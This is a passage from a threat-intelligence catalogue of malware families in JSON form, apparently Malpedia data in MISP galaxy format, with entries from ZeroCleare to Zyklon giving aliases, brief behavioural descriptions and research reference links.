"https://www.ibm.com/downloads/cas/OAJ4VZNJ" ], "synonyms": [], "type": [] }, "uuid": "a7e1429f-55bd-41ac-bf45-70c93465d113", "value": "ZeroCleare" }, { "description": "ZeroEvil is a malware that seems to be distributed by an ARSguarded VBS loader.\r\n\r\nIt first connects to a gate.php (version=). Upon success, an embedded VBS gets started connecting to logs_gate.php (plugin=, report=).\r\nSo far, only one embedded VBS was observed: it creates and starts a PowerShell script to retrieve all password from the Windows.Security.Credentials.PasswordVault. Apart from that, a screenshot is taken and a list of running processes generated.\r\n\r\nThe ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil", "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/" ], "synonyms": [], "type": [] }, "uuid": "585f9f75-1239-4561-8815-c5ae033053a1", "value": "ZeroEvil" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerolocker", "http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "b226e6bb-b8bf-4c5d-b0b3-c7c04d12679a", "value": "ZeroLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerot", "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx" ], "synonyms": [], "type": [] }, "uuid": "9b0aa458-dfa9-48af-87ea-c36d1501376c", "value": "ZeroT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus", "https://www.s21sec.com/en/zeus-the-missing-link/", "https://www.secureworks.com/research/threat-profiles/gold-evergreen", "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html", "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite", "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/", "http://eternal-todo.com/blog/new-zeus-binary", "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html", "http://eternal-todo.com/blog/zeus-spreading-facebook", "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html", "https://www.secureworks.com/research/zeus?threat=zeus", "https://www.secureworks.com/research/threat-profiles/bronze-woodland", "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html", "http://eternal-todo.com/blog/detecting-zeus", "https://www.anomali.com/files/white-papers/russian-federation-country-profile.pdf", "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/", "https://nakedsecurity.sophos.com/2010/07/24/sample-run/", "https://www.mnin.org/write/ZeusMalware.pdf", "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf", "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html", "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html" ], "synonyms": [ "Zbot" ], "type": [] }, "uuid": "4e8c1ab7-2841-4823-a5d1-39284fb0969a", "value": "Zeus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_action", "https://twitter.com/benkow_/status/1136983062699487232", "https://www.youtube.com/watch?v=EyDiIAt__dI" ], "synonyms": [], "type": [] }, "uuid": "95057d7a-b95a-4173-bae7-9256ae002543", "value": "ZeusAction" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer" ], "synonyms": [], "type": [] }, "uuid": "768f1ae5-81a6-49f2-87c1-821c247b4bf3", "value": "Zeus MailSniffer" }, { "description": "This family describes the Zeus-variant that includes a version of OpenSSL and usually is downloaded by Zloader.\r\n\r\nIn June 2016, the version 1.5.4.0 (PE timestamp: 2016.05.11) appeared, downloaded by Zloader (known as DEloader at that time). OpenSSL 1.0.1p is statically linked to it, thus its size is roughly 1.2 MB. In subsequent months, that size increased up to 1.6 MB.\r\nIn January 2017, with version 1.14.8.0, OpenSSL 1.0.2j was linked to it, increasing the size to 1.8 MB. Soon after also in January 2017, with version v1.15.0.0 the code was obfuscated, blowing up the size of the binary to 2.2 MB.\r\n\r\nPlease note that IBM X-Force decided to call win.zloader/win.zeus_openssl \"Zeus Sphinx\", after mentioning it as \"a new version of Zeus Sphinx\" in their initial post in August 2016. Malpedia thus lists the alias \"Zeus XSphinx\" for win.zeus_openssl - the X to refer to IBM X-Force.\r\n\r\nZeus Sphinx on the one hand has the following versioning (\"slow increase\")\r\n- 2015/09 v1.0.1.0 (Zeus Sphinx size: 1.5 MB)\r\n- 2016/02 v1.0.1.2 (Zeus Sphinx size: 1.5 MB)\r\n- 2016/04 v1.0.2.0 (Zeus Sphinx size: 1.5 MB)\r\n\r\nZeus OpenSSL on the other hand has the following versioning (\"fast increase\")\r\n- 2016/05 v1.5.4.0 (Zeus OpenSSL size: 1.2 MB)\r\n- 2017/01 v1.14.8.0 (Zeus OpenSSL size: 1.8 MB)\r\n- 2017/01 v1.15.0.0 (Zeus OpenSSL size: 2.2 MB)", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_openssl", "https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/", "https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/", "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/" ], "synonyms": [ "XSphinx" ], "type": [] }, "uuid": "74fc6a3a-cc51-4065-bdd9-fcef18c988a0", "value": "Zeus OpenSSL" }, { "description": "This family describes the vanilla Zeus-variant that includes TOR (and Polipo proxy). It has an almost 90% overlap with Zeus v2.0.8.9.\r\nPlease note that IBM X-Force decided to call win.zloader/win.zeus_openssl \"Zeus Sphinx\", after mentioning it as \"a new version of Zeus Sphinx\" in their initial post in August 2016. Malpedia thus lists the alias \"Zeus XSphinx\" for win.zeus_openssl - the X to refer to IBM X-Force.\r\n\r\nZeus Sphinx on the one hand has the following versioning (\"slow increase\")\r\n- 2015/09 v1.0.1.0 (Zeus Sphinx size: 1.5 MB)\r\n- 2016/02 v1.0.1.2 (Zeus Sphinx size: 1.5 MB)\r\n- 2016/04 v1.0.2.0 (Zeus Sphinx size: 1.5 MB)\r\n\r\nZeus OpenSSL on the other hand has the following versioning (\"fast increase\")\r\n- 2016/05 v1.5.4.0 (Zeus OpenSSL size: 1.2 MB)\r\n- 2017/01 v1.14.8.0 (Zeus OpenSSL size: 1.8 MB)\r\n- 2017/01 v1.15.0.0 (Zeus OpenSSL size: 2.2 MB)", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx", "https://securityaffairs.co/wordpress/39592/cyber-crime/sphinx-variant-zeus-trojan.html", "https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/" ], "synonyms": [], "type": [] }, "uuid": "997c20b0-0992-498a-b69d-fc16ab2fd4e4", "value": "Zeus Sphinx" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zezin", "https://twitter.com/siri_urz/status/923479126656323584" ], "synonyms": [], "type": [] }, "uuid": "38de079b-cc4c-47b0-b47f-ad4c013d8a1f", "value": "Zezin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhcat", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "3c74a04d-583e-40ec-b347-bdfeb534c614", "value": "ZhCat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhmimikatz", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf", "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf" ], "synonyms": [], "type": [] }, "uuid": "989330e9-52da-4489-888b-686429db3a45", "value": "ZhMimikatz" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zitmo", "https://securelist.com/zeus-in-the-mobile-facts-and-theories/36424/" ], "synonyms": [ "ZeuS-in-the-Mobile" ], "type": [] }, "uuid": "6f08bd79-d22a-471c-882b-f68a42eb4a23", "value": "ZitMo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ziyangrat", "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators" ], "synonyms": [], "type": [] }, "uuid": "c23aac20-4987-4c15-af63-7043026c5f82", "value": "ZiyangRAT" }, { "description": "This family describes the (initially small) loader, which downloads Zeus OpenSSL.\r\n\r\nIn June 2016, a new loader was dubbed DEloader by Fortinet. It has some functions borrowed from Zeus 2.0.8.9 (e.g. the versioning, nrv2b, binstorage-labels), but more importantly, it downloaded a Zeus-like banking trojan (-> Zeus OpenSSL). Furthermore, the loader shared its versioning with the Zeus OpenSSL it downloaded.\r\nThe initial samples from May 2016 were small (17920 bytes). At some point, visualEncrypt/Decrypt was added, e.g. in v1.11.0.0 (September 2016) with size 27648 bytes. In January 2017 with v1.15.0.0, obfuscation was added, which blew the size up to roughly 80k, and the loader became known as Zloader aka Terdot. These changes may be related to the Moskalvzapoe Distribution Network, which started the distribution of it at the same time.\r\n\r\nPlease note that IBM X-Force decided to call win.zloader/win.zeus_openssl \"Zeus Sphinx\", after mentioning it as \"a new version of Zeus Sphinx\" in their initial post in August 2016. Malpedia thus lists the alias \"Zeus XSphinx\" for win.zeus_openssl - the X to refer to IBM X-Force.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader", "https://securityliterate.com/chantays-resume-investigating-a-cv-themed-zloader-malware-campaign/", "https://twitter.com/ffforward/status/1324281530026524672", "https://twitter.com/VK_Intel/status/1294320579311435776", "https://clickallthethings.wordpress.com/2020/09/21/zloader-xlm-update-macro-code-and-behavior-change/", "https://securityintelligence.com/around-the-world-with-zeus-sphinx-from-canada-to-australia-and-back/", "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", "https://info.phishlabs.com/blog/surge-in-zloader-attacks-observed", "https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/", "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://johannesbader.ch/blog/the-dga-of-zloader/", "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware", "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/", "https://clickallthethings.wordpress.com/2020/06/19/zloader-vba-r1c1-references-and-other-tomfoolery/", "https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks", "https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/", "https://resources.malwarebytes.com/files/2020/05/The-Silent-Night-Zloader-Zbot_Final.pdf", "https://www.proofpoint.com/us/blog/threat-insight/zloader-loads-again-new-zloader-variant-returns", "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/", "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", "https://www.youtube.com/watch?v=QBoj6GB79wM", "https://securityintelligence.com/zeus-sphinx-pushes-empty-configuration-files-what-has-the-sphinx-got-cooking/", "https://blag.nullteilerfrei.de/2020/05/24/zloader-string-obfuscation/", "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://blog.malwarebytes.com/threat-analysis/2020/11/malsmoke-operators-abandon-exploit-kits-in-favor-of-social-engineering-scheme/", "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", "https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/", "https://blog.alyac.co.kr/3322", "https://blag.nullteilerfrei.de/2020/06/11/api-hashing-in-the-zloader-malware/", "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/", "https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit", "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", "https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/", "https://www.lac.co.jp/lacwatch/people/20201106_002321.html" ], "synonyms": [ "DELoader", "Terdot" ], "type": [] }, "uuid": "13236f94-802b-4abc-aaa9-cb80cf4df9ed", "value": "Zloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zlob", "https://blag.nullteilerfrei.de/2020/08/23/programmatically-nop-the-current-selection-in-ghidra/", "https://en.wikipedia.org/wiki/Zlob_trojan" ], "synonyms": [], "type": [] }, "uuid": "ddccba7e-89f3-4b51-803c-e473ca5623da", "value": "Zlob" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zupdater", "https://app.any.run/tasks/ea024149-8e83-41c0-b0ed-32ec38dea4a6/" ], "synonyms": [ "Zpevdo" ], "type": [] }, "uuid": "36a54d23-39ea-446c-b690-6a899890773d", "value": "ZUpdater" }, { "description": "According to FireEye, ZXSHELL is a backdoor that can be downloaded from the internet, particularly Chinese hacker websites. The backdoor can launch port scans, run a keylogger, capture screenshots, set up an HTTP or SOCKS proxy, launch a reverse command shell, cause SYN floods, and transfer/delete/run files. The publicly available version of the tool provides a graphical user interface that malicious actors can use to interact with victim backdoors. Simplified Chinese is the language used for the bundled ZXSHELL documentation.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell", "https://risky.biz/whatiswinnti/", "https://github.com/smb01/zxshell", "https://lab52.io/blog/apt27-rootkit-updates/", "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf", "https://meltx0r.github.io/tech/2019/09/19/emissary-panda-apt.html", "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox", "https://www.secureworks.com/research/threat-profiles/bronze-union", "https://content.fireeye.com/apt-41/rpt-apt41", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-keystone", "https://blogs.cisco.com/security/talos/opening-zxshell", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf" ], "synonyms": [ "Sensocode" ], "type": [] }, "uuid": "23920e3b-246a-4172-bf9b-5e9f90510a15", "value": "ZXShell" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zyklon", "https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html", "https://blog.talosintelligence.com/2017/05/modified-zyklon-and-plugins-from-india.html" ], "synonyms": [], "type": [] }, "uuid": "721e9af0-8a60-4b9e-9137-c23e86d75722", "value": "Zyklon" } ], "version": 8790 }